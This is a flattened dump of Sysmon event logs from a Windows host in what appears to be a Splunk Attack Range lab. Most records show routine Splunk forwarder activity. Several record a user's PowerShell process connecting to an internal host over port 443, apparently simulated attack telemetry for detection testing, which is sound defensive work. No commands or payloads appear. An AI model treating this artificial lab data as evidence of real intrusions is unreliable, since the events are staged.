insufficient disk space 23542300x800000000000000035083626Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:16.146{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FF0197408F96F0DE756E3F1576FBE3E,SHA256=0F0C432034BFAEB40FFD1B33F156E64194598AE5DD27CB7ED7BE5E75BA2928D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083628Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:17.366{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F252505DF784B7C67D471D96609036F4,SHA256=F55A8C9565C52547B393D3DC212E8E6CBC448FE92B4F5DFFCA4A0BD79AB40E2D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083627Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:17.366{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F24937252A905B715F9B88471F9E348B,SHA256=B37AA0C81CBBD2FCCCFB5C10EA2388EB409E95DA58E2B6074F9CA2302D9BEA6D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083630Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:06:28.320{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083678Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.320{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083677Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:06:28.320{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4D24-613A-1B90-03000000C801}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.320{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D24-613A-1B90-03000000C801}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.305{B81B27B7-4D24-613A-1B90-03000000C801}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:29.818{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F3B655E0974CA6D4F86FF69E3900D22,SHA256=C5A4FBB3804B9464EB6A91A736D60E5B0207F05247428C76490CE2726EF8713C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:29.318{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B71CF7AC13338D3FA71F18F6A9B67E12,SHA256=23B3688530B31D1CCB6B39F3F435B0697820D676139835DE462798BC039AC20E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:29.318{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B986B9817F38BAE92E83A227B66494E,SHA256=18E146EE176A7A677F40FA28EE4F4E4C8F0A59169C21D1180A97D9ED39B62037,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:29.103{B81B27B7-4D24-613A-1C90-03000000C801}7282900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035083697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:54.185{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56504-false10.0.1.12-8000- 23542300x800000000000000035083696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:30.835{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E0A298B8F555F1AD99BA68C3F7904B3,SHA256=02EF8A3B227D43F1EA08B0E8031D47ACDD0A8087F0E3068A751C5E6A5D1E1D21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035083700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:56.267{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56505-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:31.868{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=600C436BCC7A018AC99492A975A72AD6,SHA256=784F1029FB0E268E794030DDCEE2F54EF181739CE84B8349C58E938DBD77BADF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:31.269{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2BB4AF89ECA67BF07B39A7F85E62DEB8,SHA256=DE75BF5BC80A7F414F6E8C7E79C9124F87406740FB15879FC97F1EC5B5793C57,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:32.899{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FBAD037FB167ACFA128444903B19099,SHA256=B801644D30C9FA295FFF3B0CC624DC1FD3D5AA87058A44A6D4568F6AE282F594,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000035083702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:33.914{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE4C1614D5D18A2B67A86FE1FABFE7B9,SHA256=F5BCDF69852D009C3DF1DC7E643C5F5C873D05A1CA584844DE1D6556D239242F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:34.931{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41655F7B50446B2A6ABC7221EFAEADDC,SHA256=5FBABD652C9D571608E3239966877413BC8109CA53ABC7AE41FEFBA13399B4F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:35.966{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C085310D422E82AC970C20E0D607461,SHA256=60005216F312F4EA502A0CE19D8573E6563B97E863C6FE4065A1355062960334,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:35.298{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6DAF7EFE3797FAC1278FE3AFDF093FD3,SHA256=F4F04A081DB7EFC4D018A567097BB19977F1DC4D691EC831ACCCB311E59CD712,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:36.980{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20CF85C60EDDA62F09281AD52CBDE148,SHA256=08B77BB7C708A2A23308893925AFFE1D02A976E1BA9D3E095F61446E7C19B1C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:36.381{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=74BC1775D8FAB9289C035AEA8246A73F,SHA256=9DB9742C0BEAC43DE9E82CDA0BDAE55D442CC018B3BC23325D34010A67C457A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:00.279{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56507-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:00.063{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56506-false10.0.1.12-8000- 23542300x800000000000000035083710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:38.011{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6871D261F781203DC6AE5147C3B1BAB7,SHA256=BD8E42C427151FD89DA1AAE2BB893187F232D45A65032053170918BB2D901CE8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:39.032{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99F1EF5334B90F299D8A30A513BFEF36,SHA256=9DBDC5A7DDD80320D0C95B39E10DFC8D82CB6AE12776F65677A6E06F043A78CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083713Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:40.328{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C5C455FA9706B09C57DEE8444AE4A434,SHA256=07D8D0930D0C4B6EE23E0AA00B2164A8D9479E3610D5D72E56CDF885802E69A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:40.047{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE717CC6E7647000D06472C21C0655B8,SHA256=B43CD26EEB2C8C756DA1CC9BE3863C03A11080815B138385F93AD7F708465ECA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083714Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:41.062{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9531C1DB06079B46433A031EF0E39F4,SHA256=5F8989E254A6EB2C1A7C785520C8427BDDAAA51FB833FE4D9B05C9CE820A9EC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083717Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:06.074{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56509-false10.0.1.12-8000- 354300x800000000000000035083716Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:05.291{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56508-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083715Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:42.062{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFEA352F5EBB2A4F3406A93FA5CC1277,SHA256=B2EBF0A4574F3158248AEC549B1BC2657C62639E49E56573380A9CF0CC75A8E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.928{B81B27B7-4D33-613A-1D90-03000000C801}51321600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.760{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D33-613A-1D90-03000000C801}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:06:43.760{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.760{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:06:43.760{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083722Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.760{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083721Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:06:43.760{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4D33-613A-1D90-03000000C801}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083720Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.760{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D33-613A-1D90-03000000C801}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 